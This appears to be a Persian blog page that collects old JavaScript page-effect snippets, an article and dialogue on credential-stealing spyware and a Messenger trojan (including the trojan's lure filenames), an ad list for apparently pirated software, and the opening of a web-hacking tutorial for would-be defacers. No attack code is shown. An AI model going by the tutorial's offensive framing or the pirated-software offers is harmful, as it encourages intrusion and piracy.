مجله اينترنتي آسمون

Message Reader

نمایش متن به صورت افکت

<body onload="if (document.all||document.layers) {regenerate2();update()}"> <style>  </style> <div id="msgline"> <div id="msgtext" class="msgtextfont">Starting Messages...</div> </div> <script language="JavaScript1.2"> var speed=4000 var news=new Array() news[0]="<a href='http://www.webloger.5u.com'>First line of text....</a>" news[1]="<a href='http://www.webloger.5u.com'>Second line of text....</a>" news[2]="<a href='http://www.webloger.5u.com'>Third line of text....</a>" news[3]="<a href='http://www.webloger.5u.com'>Add as many as you want....</a>" i=0 if (document.all) tickerobject=document.all.msgtext.style else tickerobject=document.msgline.document function regenerate(){ window.location.reload() } function regenerate2(){ if (document.layers) setTimeout("window.onresize=regenerate",450) } function update(){ BgFade(0xff,0xff,0xff, 0x00,0x00,0x00,10); if (document.layers){ document.msgline.document.msgtext.document.write('<span class="msgtextfont">'+news[i]+'</span>') document.msgline.document.msgtext.document.close() } else document.all.msgtext.innerHTML=news[i] if (i<news.length-1) i++ else i=0 setTimeout("update()",speed) } function BgFade(red1, grn1, blu1, red2, grn2, blu2, steps) { sred = red1; sgrn = grn1; sblu = blu1; ered = red2; egrn = grn2; eblu = blu2; inc = steps; step = 0; MsgDither(); } function MsgDither() { var epct = step/inc; var spct = 1 - epct; if (document.layers) tickerobject.bgColor = Math.floor(sred * spct + ered * epct)*256*256 + Math.floor(sgrn * spct + egrn * epct)*256 + Math.floor(sblu * spct + eblu * epct); else tickerobject.backgroundColor= Math.floor(sred * spct + ered * epct)*256*256 + Math.floor(sgrn * spct + egrn * epct)*256 + Math.floor(sblu * spct + eblu * epct); if ( step < inc ) { setTimeout('MsgDither()',50); } step++; } </script>

Rolling Credits

به حرکت در آوردن آسکرول لاک از بالا به پایین

<SCRIPT LANGUAGE="JavaScript">  </SCRIPT> </HEAD> <BODY onload="scroller()"> <CENTER> <font face="VERDANA, ARIAL" size="5" color=804040>Rolling Credits</font><p> <font face="VERDANA, ARIAL" size="4">This script allows you to: <HR WIDTH=350 NOSHADE> <P> www.webloger.5u.com<P> Place<P> text<P> descriptions<p> of <P>any <P>sort<p> and it will <P>scroll up<p> the page <P>until its done.<p> <P> You can even<P> make <A HREF="http://www.webloger.5u.com/">Links.</A><p> Or<P> use<P> images.<p> <p></font> </CENTER>

Slide Out

نمایش لینک به صورت منویی

<SCRIPT LANGUAGE="JavaScript">  </SCRIPT> <STYLE TYPE="text/css">  </STYLE> </HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" onLoad="init()"> <DIV ID="slideoutInterface"> <DIV ID="slideoutSidebar1"><P ALIGN=CENTER><A HREF="javascript:slideout(slideout1)">Contact Us</A></P></DIV> <DIV ID="slideoutSidebar2"><P ALIGN=CENTER><A HREF="javascript:slideout(slideout2)">Help</A></P></DIV> <DIV ID="slideoutSidebar3"><P ALIGN=CENTER><A HREF="javascript:slideout(slideout3)">Services</A></P></DIV> <DIV ID="slideoutSidebar4"><P ALIGN=CENTER><A HREF="javascript:slideout(slideout4)">Products</A></P></DIV> <DIV ID="slideoutSidebar5"><P ALIGN=CENTER><A HREF="javascript:slideout(slideout5)">Order</A></P></DIV> <DIV ID="slideoutContent"> <DIV ID="slideoutContent1"> <P ALIGN="CENTER"><STRONG>Contact Us</STRONG> <P> <TABLE BORDER=0 WIDTH=275><TD> You can add <A HREF="http://www.webloger.5u.com"><FONT COLOR=BLUE>Links</FONT></A>. <P> Or images: <IMG SRC="smile.gif" BORDER=0 HEIGHT=11 WIDTH=11> <P> Or just use text to explain what you have or what you are doing. </TD></TABLE> </P> </DIV> <DIV ID="slideoutContent2"> <P ALIGN="CENTER"><STRONG>Help</STRONG> <P> <TABLE BORDER=0 WIDTH=275><TD> You can add <A HREF="http://www.webloger.5u.com"><FONT COLOR=BLUE>Links</FONT></A>. <P> Or images: <IMG SRC="smile.gif" BORDER=0 HEIGHT=11 WIDTH=11> <P> Or just use text to explain what you have or what you are doing. </TD></TABLE> </P> </DIV> <DIV ID="slideoutContent3"> <P ALIGN="CENTER"><STRONG>Services</STRONG> <P> <TABLE BORDER=0 WIDTH=275><TD> You can add <A HREF="http://www.webloger.5u.com"><FONT COLOR=BLUE>Links</FONT></A>. <P> Or images: <IMG SRC="smile.gif" BORDER=0 HEIGHT=11 WIDTH=11> <P> Or just use text to explain what you have or what you are doing. </TD></TABLE> </P> </DIV> <DIV ID="slideoutContent4"> <P ALIGN="CENTER"><STRONG>Products</STRONG> <P> <TABLE BORDER=0 WIDTH=275><TD> You can add <A HREF="http://www.webloger.5u.com"><FONT COLOR=BLUE>Links</FONT></A>. <P> Or images: <IMG SRC="smile.gif" BORDER=0 HEIGHT=11 WIDTH=11> <P> Or just use text to explain what you have or what you are doing. </TD></TABLE> </P> </DIV> <DIV ID="slideoutContent5"> <P ALIGN="CENTER"><STRONG>Order</STRONG> <P> <TABLE BORDER=0 WIDTH=275><TD> You can add <A HREF="http://www.webloger.5u.com"><FONT COLOR=BLUE>Links</FONT></A>. <P> Or images: <IMG SRC="smile.gif" BORDER=0 HEIGHT=11 WIDTH=11> <P> Or just use text to explain what you have or what you are doing. </TD></TABLE> </P> </DIV> </DIV> </BODY> </HTML>

Zoom Message

نمایش متن به صورت افکت

<style type="text/css"> body { background-color:#FFFFFF; font-family: Arial; font-size:10pt; } </style> <script> // text=new Array('www.','webloger','.5u','.com','The Best Website') // var numText=5 // color=new Array('#000000','#2F2F2F','#4F4F4F','#7F7F7F','#408080') // var numColors=5 // var endSize=70 // var Zspeed=30 // var Cspeed=200 // var font='Arial Black' // var hide=false var size=10 var gonum=0 var ie, n; if (document.all) { n=0 ie=1 zoomText='document.all.zoom.innerText=text[num]' zoomSize='document.all.zoom.style.fontSize=size' closeIt="" fadeColor="document.all.zoom.style.color=color[num]" } if (document.layers) { n=1;ie=0 zoomText="" zoomSize="document.zoom.document.write('<p align=\"center\" style=\"font-family:'+font+'; font-size:'+size+'px; color:'+color[0]+'\">'+text[num]+'</p>')" closeIt="document.zoom.document.close()" fadeColor="document.zoom.document.write('<p align=\"center\" style=\"font-family:'+font+'; font-size:'+endSize+'px; color:'+color[num]+'\">'+text[numText-1]+'</p>')" } function zoom(num,fn){ if (size<endSize){ eval(zoomText) eval(zoomSize) eval(closeIt) size+=5; setTimeout("zoom("+num+",'"+fn+"')",Zspeed) }else{ eval(fn); } } function fadeIt(num){ if (num<numColors){ eval(fadeColor) eval(closeIt) num+=1; setTimeout("fadeIt("+num+")",Cspeed) }else{ hideIt() } } function hideIt(){ if(hide){ if(ie)document.all.zoom.style.visibility="hidden" if(n)document.layers.zoom.visibility="hidden" } } function init(){ if(ie){ document.all.zoom.style.color=color[0] document.all.zoom.style.fontFamily=font } if(ie || n) go(0) } function go(num){ gonum+=1 size=10 if(num<numText){ zoom(num,'go('+gonum+')') }else{ fadeIt(0) } } </script> </head> <body onload="init()" bgcolor="FFFFFF"> <CENTER> </CENTER><P> <div id="zoom" align="center" style="position:absolute; top:150"> </DIV>

Add Bookmark

اضافه کردن صفحه در بوکمارک

<script language="JavaScript1.2">  </script>  <a href="javascript:ccaddbookmark()" target="_self"> <font size="1" face="Arial">[ Add Webloger to your Favorites ]</font> </a>

Mouse Cursor Crosshairs

دو خط قرمز بسیار زیبا به دنبال موس

<style>  </style>  <div id="leftright" style="width:expression(document.body.clientWidth-2)"></div> <div id="topdown" style="height:expression(document.body.clientHeight-2)"></div> <script language="JavaScript1.2">  </script>

Default Start Up Page Link

لینک قرار دادن سایت در هوم پیج

<font face="Tahoma" size="2" color="#008000"> <a class="chlnk" style="cursor:hand; text-decoration:none; font-weight:700" onClick="this.style.behavior='url(#default#homepage)'; this.setHomePage('http://www.webloger.5u.com/');"> Click here to make Webloger your default homepage! </a> </font>

Disable Right Click Menu

از کار انداختن راست کلیک

<SCRIPT LANGUAGE="JavaScript">  </script>

Find In Page Form

قرار دادن جستجوگر کلمه در سایت

<script language="JavaScript"> var NS4 = (document.layers); var IE4 = (document.all); var win = window; var n = 0; function findInPage(str) { var txt, i, found; if (str == "") return false; if (NS4) { if (!win.find(str)) while(win.find(str, false, true)) n++; else n++; if (n == 0) alert("Not found."); } if (IE4) { txt = win.document.body.createTextRange(); for (i = 0; i <= n && (found = txt.findText(str)) != false; i++) { txt.moveStart("character", 1); txt.moveEnd("textedit"); } if (found) { txt.moveStart("character", -1); txt.findText(str); txt.select(); txt.scrollIntoView(); n++; } else { if (n > 0) { n = 0; findInPage(str); } else alert("Not found."); } } return false; } </script>  <form name="search" onSubmit="return findInPage(this.string.value);"> <font size=3><input name="string" type="text" size=15 onChange="n = 0;"></font> <input type="submit" value="Find"> </form>

Left-to-Right Page Scroll

از چپ به راست بردن اسکرول لاک

<script language="JavaScript1.2">  </script>

Scrollable Embedded Window

قرار دادن متن در پنجره ای زیبا

<ilayer name="scroll1" width=170 height=150 clip="0,0,170,150"> <layer name="scroll2" width=170 height=150 bgColor="white"> <div id="scroll3" style="width:170;height:150;background-color:yellow;overflow:scroll"> This is a nifty little script that allows you to put any content you want within a scrollable mini "window". This will allow you to save valuable screen space while making your page more "interactive". <br><br> This script uses two different techniques, one for Internet Explorer and one for Netscape, to create the scrollable window. <br><br> IE 4+ users will be able to use scrollbars to scroll the window, while Netscape users will have to use the "up" and "down" buttons instead (since Netscape does not support the adding of scrollbars to the "window" contents). </div> </layer> </ilayer> <script> var nsstyle='display:""' if (document.layers) var scrolldoc=document.scroll1.document.scroll2 function up(){ if (!document.layers) return if (scrolldoc.top<0) scrolldoc.top+=10 temp2=setTimeout("up()",50) } function down(){ if (!document.layers) return if (scrolldoc.top-150>=scrolldoc.document.height*-1) scrolldoc.top-=10 temp=setTimeout("down()",50) } function clearup(){ if (window.temp2) clearInterval(temp2) } function cleardown(){ if (window.temp) clearInterval(temp) } </script> <br><span style="display:none" style=&{nsstyle};><a href="#" onMousedown="up()" onMouseup="clearup()" onClick="return false" onMouseout="clearup()">Up</a> | <a href="#" onMousedown="down()" onMouseup="cleardown()" onClick="return false" onMouseout="cleardown()">Down</a> | <a href="#" onClick="if (document.layers) scrolldoc.top=0;return false">Top</a> | <a href="#" onClick="if (document.layers) scrolldoc.top=scrolldoc.document.height*(-1)+150;return false">Bottom</a></span>

جلوگيري از لو رفتن
شناسه و اسم رمز شما

مقاله‌اي از: دكتر بهراد صدوقيان

يكي از دوستان به تازگي به من گفت كه هر تعداد كارت اينترنت مي‌خرد خيلي زود تمام مي‌شود و معتقد بود همه شركت‌هاي اينترنتي متقلب هستند و كمتر از زمان مقرر خدمت ارائه مي‌دهند. دستگاهش را كه بررسي كردم پر بود از انواع spyware! اين نرم‌افزارهاي جاسوس تلفن و نام كاربري و اسم رمز دوست ما را از روي دستگاهش بر مي‌دارند و براي ارباب خود در اينترنت ارسال مي‌كنند و فرد فوق به اين ترتيب صاحب اينترنت مجاني مي‌شود و دوست ما فكر مي‌كرد كه شركت‌ها كم‌فروشي مي‌كنند.

ابتدا بهترين، ساده‌ترين و كارآمدترين روشي كه براي ممانعت از اين مشكل وجود دارد:

اسم رمز اتصالات اينترنت خود را ضبط نكنيد! انتخاب Save Password را نزنيد. گرچه ناچار مي‌شويد هربار كه به اينترنت وصل مي‌شويد يك‌بار اسم رمز را بزنيد ولي در مجموع مي‌صرفد!

نرم‌افزارهاي Spyware انواع نرم‌افزارهايي هستند كه بدون خواست شما روي دستگاه شما نصب مي‌شوند.

روش‌هاي ورود اين نرم‌افزارها متعدد هستند:

þ بي‌دقتي شما در اجراي فايل‌هاي اجرايي exe, com, vbs, ... كه در ظاهر حاوي يك برنامه مفيد و در باطن حاوي spywareي هستند كه با روش اسب تروآ وارد دستگاه شما مي‌شوند. براي ممانعت از اين مشكل از اجراي فايل‌هاي اجرايي ناشناس و غيرمطمئن كه Download كرده‌ايد يا از طريق email يا سي‌دي و ... دريافت كرده‌ايد خودداري كنيد.

þ نصب نرم‌افزارهاي ناشناس و نامطمئن بر روي دستگاه.

þ بعضي از انواع آنها هنگامي كه روي اينترنت كار مي‌كنيد از طريق نصب OCXهايي (ActiveX) كه بعضي سايت‌ها داخل WebPageهايشان گذاشته‌اند به روي دستگاه شما نصب مي‌شوند. البته IE هنگام نصب اين ocxهاي ناشناس از شما اجازه مي‌گيرد كه معمولاً خيلي راحت قبول مي‌كنيد!

þ بعضي ديگر از انواع spyware از طريق سوراخ‌هاي امنيتي كه در ويندوز وجود دارد و حاصل اشتباهات برنامه‌نويسان ويندوز است هنگام اتصال به اينترنت به دستگاه شما متصل مي‌شوند.

SpyWareها يا MalWareها چكار مي‌كنند:

اسم رمز اتصالات اينترنت شما را مي‌دزدند!

þ از دستگاه شما به عنوان Spam Server استفاده مي‌كنند و نامه‌هاي Spam براي ديگران ارسال مي‌كنند و به اين ترتيب اينترنت شما به شدت كند مي‌شود.

þ فعاليت شما روي كامپيوتر و اينترنت را بررسي مي‌كنند.

þ اطلاعات شما را مي‌دزدند!

þ از دستگاه شما به عنوان پايگاهي براي انتشار و آلوده كردن دستگاه‌هاي ديگر استفاده مي‌كنند.

þ بدون هدف خاصي مزاحم شما مي‌شوند!

چگونه با آنها مقابله كنيم:

پسوندهاي فايل‌هاي اجرايي را بشناسيد (Com, PIF, Exe, VBS, BAT, CMD) و هر فايل اجرايي ناشناسي را اجرا نكنيد! از آنجايي كه نسخه‌هاي جديدتر Outlook اصولاً از بازكردن ضمايمي چنين فايل‌هايي ممانعت مي‌كنند بعضي از هكرهاي رند فايل‌هاي با پسوندهاي فوق را داخل يك فايل Zip مي‌گذارند و نام فايل اصلي داخل Zip را با استفاده از Space و پسوندهاي مختلف چنان بلند مي‌كنند كه حواس شما را از پسوند آخر كه يكي از پسوندهاي اجرايي است پرت كنند.

þ از نصب كردن برنامه‌هاي ناشناس و نامطمئن به هر صورتي كه آنها را دريافت كرده‌ايد (سي‌دي، فلاپي، اينترنت، email و ...) خودداري كنيد.

þ همانطوري كه گفته شد اسم رمز خود را ضبط نكنيد.

þ حتماً ICF را فعال كنيد: هنگام تعريف ارتباط اينترنت روي آن Properties بگيريد و در صفحه Advnaced انتخاب Internet Connection Firewall (Protect My Computer....( را انتخاب كنيد.

þ بعضي از فايل‌هاي MS Office (Word, Excel, Access, PowerPoint, ...) مانند فايل‌هاي Doc, XLS, MDB, PPT, ADP حاوي ماكروهايي هستند كه قابليت آلوده بودن دارند. هنگام باز كردن اين فايل‌ها اگر از شما در مورد Macroها سوال كرد آنها را Disable كنيد.

þ هنگامي كه در IE در سايت‌ها گشت مي‌زنيد گاهي روي دستگاه شما OCXهايي نصب مي‌شود كه قبل از نصب از شما سوال مي‌شود اگر در سايت مطمئني نيستيد قبول نكنيد كه ActiveX فوق روي دستگاه شما نصب شود.

þ براي بستن سوارخ‌هاي امنيتي ويندوز خود آخرين Updateها، Service Packها، Patchها، Service Releaseها، Fixها، HotFixهاي (همه در واقع يك چيز هستند) سيستم عامل خود را نصب كنيد! هر چند وقت يكبار هم روي WindowsUpdate برويد و Fixهايي كه از نوع Securityهستد را نصب كنيد! البته گاهي حجم بعضي Fixها آنقدر بالاتر است كه اينترنت شما را بيشتر از SpyWare هدر مي‌دهند!

þ از نرم‌افزارهايي مانند AdAware و انواع ويروس‌كش براي پيدا كردن و از بين بردن SpyWareها دستگاه خود استفاده كنيد.

þ به جاي ارجاع دادن نامه‌هاي ساده‌انگارانه Hoax (نامه‌هاي سَرِكاري كه به شما مي‌گويند كه اين نامه را به 100 نفر ارجاع دهيد كه بدبخت نشويد يا خوشبخت بشويد و يا ميكروسافت به ازاي هر بار ارجاع به شما ده دلار پول مي‌دهد چون بيل گيتس خيلي پولدار است و ....)، سعي كنيد حواستان را معطوف نامه‌هاي ضميمه‌دار خطرناك و ناشناس كنيد.

þ جالب است كه بدانيد نامه‌هايي هم كه مي‌گويند نامه با موضوع فلان يا ضميمه فلان ويروسي است هم اكثر Hoax سركاري هستند (يك نفر اين نامه را به صورت يك شايعه مي‌نويسد و بعد مي‌نشيند كنار و به سادگي ديگران مي‌خندد). آنها را هم جدي نگيريد و ارجاع نكنيد. شما اصولاً بايد همه فايل‌هاي ضميمه نامه‌ها را خطرناك فرض كنيد و احتياجي به اين تذكرات نداريد. در ضمن SpyWareنويس‌ها هم اينقدر كندذهن نيستند كه نامه‌هايي با موضوع، گيرنده، فرستنده يا ضميمه يكسان توليد كنند.

هر كس اين نامه را به 10 نفر ارجاع بدهد انشاالله در دنيا و آخرت آرامش نصيبش شود!!!

اصلا این كه میگی چی هست؟
اینی كه داریم دربارش صحبت میكنیم یه برنامه جاسوسه
برنامه - جاسوس - مگه میشه؟
بابام جان، برنامه جاسوس به برنامه‌ای میگن كه اطلاعات كامپیوتر شما رو میدزده و به یه نفر دیگه كه میتونه ازشون استفاده كنه میفرسته
اوا خاك بر سرم ننه، حالا چی میدزده این بی‌مروت؟
وقتی میگیم اطلاعات منظور هرچی تو كامپیوترتونه دیگه. یه وقت یكی میاد اكانت اینترنت شما رو میدزده، یكی میاد رمز ایمیل شما رو برمیداره، اگه خارجكی هم باشین و از كارت اعتباری برای خرید تو اینترنت استفاده میكنین، این برنامه میتونه رمز كارت شما رو لو بده.
وای این كه خیلی ترسناكه. یعنی میگی مسریه؟ همه میگیرن؟ مثل ایدز میمونه؟
معلومه كه ترسناكه، البته همیشه آلوده شدن شخص تقصیر خودشه (تقریبا مثل ایدز). معمولا ما ها كه كمتر اطلاعات داریم میایم و هرچی از این و اون به دستمون رسید رو اجرا می‌كنیم(كاملا مثل ایدز)، چه از طریق ایمیل، چه از طریق دوستای ناباب، چه CD و چه انتقال اطلاعات از هر طریق ممكن این اطلاعات به دستمون رسیده باشه. پس مواظب خودتون باشین و هركی بهتون هر چی داد زود اجراش نكنین، هرچند اسمی داشته باشه كه نتونین طاقت بیارین و بازش نكنین.
حالا ما چیكار كنیم كه آلوده نشیم؟
همونطور كه گفتم سعی كنید هر چی به دستتون رسید فوری باز نكنید. اگه یه Email دریافت كردید و دیدید یه پیوست (Attachment) داره به اسم Love یا نمیدونم Beauty Screen Saver یا هر اسم جالب دیگه یهویی حول نكنید كه وای ببین كدوم عزیزی برام اینو فرستاده و زودی بازش كنید. خوب اینجوری درجا ویروس میگیرن. یادتونه مامانتون كوچیكتر كه بودین همیشه بهتون میگفت از دست غریبه‌ها چیزی نگیرین؟ اینم همینطوریه. از ناشناس چیز نگیرین حتی اگه ادای عاشقای حرفه‌ای رو در آورد.
راه پیشگیری چیزی داره؟
بهترین راه حل همیشه داشتن یه ضد ویروس قوی و جدیده. من كه خودم شخصا Norton AntiVirus رو پیشنهاد میدم. با كلی ضد ویروس دیگه هم كار كردم ولی هیچكدوم به اطمینان و قدرت این نمیرسه.
برین از دوستی، فامیلی، كسی كه میشناسین یه CD بگیرین كه توش نورتون داشته باشه. هر ورژنی (Version) هم بود مهم نیست. بعد یه سر بزنید سایت خود نورتون قسمت Update مشخصات ویروس‌ها كه هر روز آپدیت میشه و از اونجا این فایل 4 مگابایتی رو دانلود كنید. (فایل 7 مگیه یا فایل 1.5 مگیا رو دانلود نكنید ها) توصیه من اینه كه حداقل ماهی یه بار این كار رو بكنید. (نكردید هر 2 ماه یه بار آپدیت كنید، نخواستین 3 ماه یه بار،نشد 4 ماه یه‌بار، اصلا به من چه كه چند ماه یه بار) و بعد اجراش كنید كه ویروس‌یابتون به روز بشه. اینجوری احتمال گرفتن ویروس خیلی كمتر میشه.
اینجوری كه گفتی هوس كردم منم یه بار از این برنامه بد، بدا استفاده كنم.
میل خودتونه. ببینین معمولا این برنامه‌های دزد و جاسوس رو یه سری برنامه‌نویس حرفه‌ای مینویسن، اونام كه نمیان به خاطر چشم و ابروی من مفت و مجانی برنامه بنویسن، حتما یه چیزی توش داره كه همچین جونورایی درست میكنن. معمولا این برنامه‌های دزد هم برای شما دزدی میكنن هم برای نویسنده، یعنی وقتی شما اجرا میكنیدشون اطلاعات شما رو كش میرن و میبرن میدن به صاحابش و اطلاعات اون بنده خدایی هم كه شما خواستین آلوده كنین رو میدن به شما. در اصل یه جاسوس دو جانبه هستن.

حالا راجب ضد ویروست بگو! اصلا بگو ببینیم برای چی این كارو كردی؟ مگه بیكاری؟
نه بیكار نیستم ولی اول كه گفتم این دوستمون آقا آرش اینو از ما خواست ما هم اجابت كردیم، گفتیم صواب داره.
در ضمن من از اینجور كارها بدم نمیاد، میشه یه امتحان برای خودم. برنامه نویسی سیستمی رو خیلی دوست دارم. مخصوصا وقتی به كارهای امنیتی و شبكه مربوط بشه. اینم اولین نوع ضد ویروس من بود كه نوشم. خودم كلی كیف كردم.

اینجاهاش دیگه یخورده تخصصیه اگه نخواستین نخونین:
1- ویروس رو اول یه چك كردم ولی چون زیاد از تو مایه‌های كرك وارد نیستم نتونستم خیلی وارد فایل اجراییش بشم. با یه Trace مشخص شد كه از UPX برای فشرده كردن EXE استفاده كرده ولی با یه برنامه دیگه كه نتونستم بفهمم چیه روش یه Protection گذاشته بود كه خلاصه بیخیال شدم و نتونستم بازش كنم.
حتی ممكنه از یه نسخه UPX تغییر كرده استفاده كرده باشه؟! چون این برنامه Open Source است. (Open Source به برنامه‌هایی میگن كه نویسنده كد اصلی برنامه رو بصورت رایگان در اختیار دیگران قرار میده تا اونها هم بتونن كد رو ببینن و یاد بگیرن، ولی اگه كسی تغییری توی كد اصلی داد باید بالاش بنویسه كه این كد رو از كجا ورداشتم و مال كیه.)

2- با یه نگاه تو فایل اجرایی Server (همون فایلی كه برای مقتول فرستاده میشه) یه چیزای عجیبی دیدم: مثل اینكه این جناب اسب تروا كه قراره برای شما كار كنه و ID و رمز مسنجر طرف رو برای شما ارسال كنه كارهای دیگه‌ای هم انجام میدن. فكر كنم اگه درست فهمیده باشم اكانت اینترنت ایشون رو برای سازنده ارسال میكنه. اینجوری اگه فرض كنیم هر شب 10 نفر جدید از این برنامه در كل ایران استفاده كنن و هر كدوم یه كارت 30 ساعته داشته باشن، میكنه از قرار شبی 300 ساعت اینترنت مفت و مجانی در همه جای ایران كه سرای من است.

3- اولش میترسیدم فایل Server رو اجرا كنم ولی بعد یواش یواش دل شیر پیدا كردم و فكر كنم تا حالا بیش از 200 مرتبه اجراش كردم. كلا برنامه بی آزاری به نظرم رسید. (البته نه برای همه: حتی شما دوست عزیز) كافیه یه بار این برنامه خوشگل و هوس انگیز رو اجرا كنید تا اكانت شما هم لو بره. در كل كد قشنگی داشت. با دلفی نوشته بودنش و منم از دلفی زیاد سر در نمیارم. با این حال استفاده ماهرانه از API توش واضح بود كه به نظرم جالب اومد.

4- از نویسندش خوشم اومد. یه مهندس اجتماعی حرفه‌ای بوده، میدونسته مردم ایران از چه چیزایی خوششون میاد و دنبال چه چیزایی هستن. مخصوصا اسمهایی كه برای Server انتخاب كرده بود برام جالب بود مثلا:
Scooter.exe Khafan.exe MyPic.jpg.scr Love.exe Yahoo_Cracker.exe Boos.exe Hediye_tehrani.exe Arian.exe Googoosh.exe
بابا طرف روانشناسه. والا اگه برای منم خیلی از این فایلها بیاد شاید باز كنم :)

5- روش فرستادن اطلاعاتش هم فكر نو بود. تا حالا ندیده بودم. معمولا تروجان ها از یه پورت استفاده میكنن و برای همین هم زود به دام FireWall ها و برنامه‌های مشابه میوفتن ولی این یكی از مسنجر استفاده میكنه كه خیلی هم بی سر و صدا و آب زیر كاهانه كارش رو میكنه.

6- در آخر هم از نویسنده یا نویسندگان محترم این برنامه خواهش میكنم این بنده حقیر رو اعدام نكنن. بابا شما یه برنامه نوشتین مردم رو بیچاره كنین، ما هم یه برنامه نوشتیم اون بیچاره‌ها رو با چاره كنیم. یه وقت به سرتون نزنه از این گناهای كبیره بكنین و بیاین همگی بریزین سر ماها. این دفعه رو بی خیال شین. حتی جرات نكردم اسم خودم رو توی برنامه بنویسم ;)

در سامان خفن

<!-- SUMMARY BRIEF

This code makes a link that will set the user's
default start up page (homepage) to whatever
link you specify.

You can change the URL (http://www.saman-golestani.tripod.com)
to anything else you want. You can also change
the Link Text in the code below. Make sure not
to change any other code.

-->

<a class="chlnk" style="cursor:hand; text-decoration:none; font-weight:700"
onClick="this.style.behavior='url(#default#homepage)';
this.setHomePage('http://www.webloger.5u.com/');">
Click here to make Webloger your default homepage!
</a>

</font>

در سامان خفن

سلام لطفا نظر بدهید

سامان

وب    تصاویر    گروهها    فهرست

  جستجوي پيشرفته تصوير
  تنظيمها
  راهنمای يافتن نصوير

کاملترین مجموعه ویرایش و ساخت چهره Face 2 Face
۲. مجموعه افکتهای سینمایی: انواع انفجارها تیر اندازیها طبیعت و...
۳. کاملترین آموزش طراحی و راه اندازی سایتهای اینترنتی Learning Web site
۴. آموزش اتوکد 2004
۵. مجموعه مکس شامل : مولتی میدیا – اینترنت – گرافیک – انیمیشن – PC Tools و ...
۶. آموزش جامع تعمیر انواع گوشیهای موبایل
۷. قویترین نرم افزار برای طراحی دکوراسیون داخلی و خارجی در محیط 2 بعدی و 3 بعدی Floor Plan
۸. Dance 7
۹. Posters Pack 1 & 2 شامل 8251 پوستر جذاب در 324 مدل
جهت دیدن ادامه لیست و نحوه خرید ادامه متن را کلیک کنید.

۱.Visual Studio 2005 Professional
۲. Pinnacle Studio Plus 9.4
۳. SQL Server 2005 Enterprise Edition
۴. سری نرم افزارهای کاربردی موبایل Mobile Tools
۵. آموزش کارگاه میکس
۶. Avid Xpress Pro HD v5.0.3
۷. Assistant 2006 Part 1&2
۸. Fine Art Gallery 2005
۹. Discreet Combustion v4.0 همراه با اموزش
۱۰. Poser6
۱۱. KGN2005
۱۲.جدیدترین پلاگینهای 3dmax
۱۳. کاملترین مجموعه تصاویر منحصر به فرد Photo Gallery 2 در 5CD
۱۴. روش ساخت تیزرهای تبلیغاتی Animation Master Pack 9
۱۵. مجموعه کامل Lets go
۱۶. تکنیکهای میکس و مونتاژ فیلم Video Tools master Pack 7
۱۷.مجموعه کتابهای حرفهای برای کامپیوتر XSLT
۱۸. بهترین و کاملترین مجموعه فلش دارای 10000 سورس آماده فلش Power Flash 2004

بازیها:
مسابقات کمپانی آلفا رمو S.C.A.R
ماشین سیاست
میراث امپراطور The Sethlers
مدال افتخار نبرد اقیانوس ارام Pacific Assault
نیمه عمر 2 Half-Life2
نگهبان : بازماندگان در زمان Sentinel Desceiid Alltsin Time
توطه در مایند گیت PSI – OPS
فوق العاده Fantastic4
نیروی دلتا Delta Force Xtreme
جنگجوی ارتش : موگادیشکو Army Ranger

http://S

کلیپ آموزشی

وب هكينگ(1)

خوب در اول کار ميگم که از کجا ميخوايم وب هکينگ رو شروع کنيم در حقيقت يک فهرست واسه کارمون داشته باشيم

چيست ؟ webhacking

چرا وب هکينگ بيشتر مورد توجه هکران حرفه اي است؟

معرفي کوتاه روشهاي پر استفاده در وب هکينگ

دفاع در برابر وب هکينگ

.................................................. .................................................. ...

وب هکينگ چيست؟

خوب فکر کنم که همه بدونند که هر وب سايتي يا وبلاگي که ميبينيد روي هارد يک کامپيوتر قرار دارند که همه هم ميدونيد که به اون سيستم هاي کامپيوتري سرور ميگويند ولي اين سرور ها که اين صفحات وب رو ذخيره ميکنند و در اختيار شما قرار ميدهند در اصطلاح تخصصي وب سرور ناميده ميشوند خوب من بيشتر هکرهاي تازه کاري که ديدم فکر ميکردند واسه ديفيس سايت (تغيير چهره ظاهري) حتما بايد سرور اون سايت رو مورد حمله قرار بدهند اما اين فکر کاملا غلطه به هر حال هر سايت داراي تعدادي صفحه وب نوشته شده با يکي از زبان هاي برنامه نويسي تحت وب ميباشد همچنين وب سروري که صفحات وب سايت بر روي آن قرار دارند از برنامه اي براي سازمان دهي و اداره وب سايت و عمليات هاي مربوط به آن استفاده ميکند

مثال : زبانهاي برنامه نويسي تحت وب

HTML,ASP,PHP,Java Script,CGI(Perl), and ...

مثال : برنامه هاي مديريت وب سرور

IIS,APACHE,PWS, and ...

نکته : به صفحاتي که محتواي آنها هميشه ثابت ميباشند صفحات ايستا ميگويند از زبانهاي برنامه نويسي صفحات ايستا ميتوان اچ تي ام ال را نام برد

نکته : به صفحاتي که داده هاي آنها بر اساس داده هاي گرفته شده از کاربر و موقعيت زماني و ... تغيير ميکنند در اصطلاح صفحات متحرک گقته ميشوند. اين گونه صفحات در اصطلحات تخصصي تر برنامه هاي تحت وب يا وب اپليکاتيون هم خوانده ميشوند . نفوذ به برنامه هاي تحت وب و برنامه مديريت وب سرور را وب هکينگ ميگويند

.................................................. .................................................. ...

چرا وب هکينگ بيشتر مورد توجه هکران حرفه اي قرار ميگيرد ؟

اصولا وب هکينگ بسيار راحت تر و کم دردسر تر از نفوذ به خود سرور ميباشد. زيرا مديران امنيت شبکه هم با توجه به شرايط اجتماعي خود متوجه شده اند که اکثر نفوذ گران به دنبال نفوذ مستقيم به سرور هستند. در نتيجه بر روي امنيت سرور خود سرمايه گذاري زيادي ميکنند و ابزارهاي امنيتي گراني مانند فايروال و آي دي اس و ان اس ام و ... بر روي آن نصب ميکنند و از امنيت برنامه تحت وب خودشان غافل ميمانند و نفوذگران با تجربه هم که به دنبال آسانترين راه براي نفوذ هستند و حوصله روبرو شدن با امکانات امنيتي سرور رو ندارند به سراغ وب هکينگ ميروند

.................................................. .................................................. ...

معرفي کوتاه روشهاي وب هکينگ

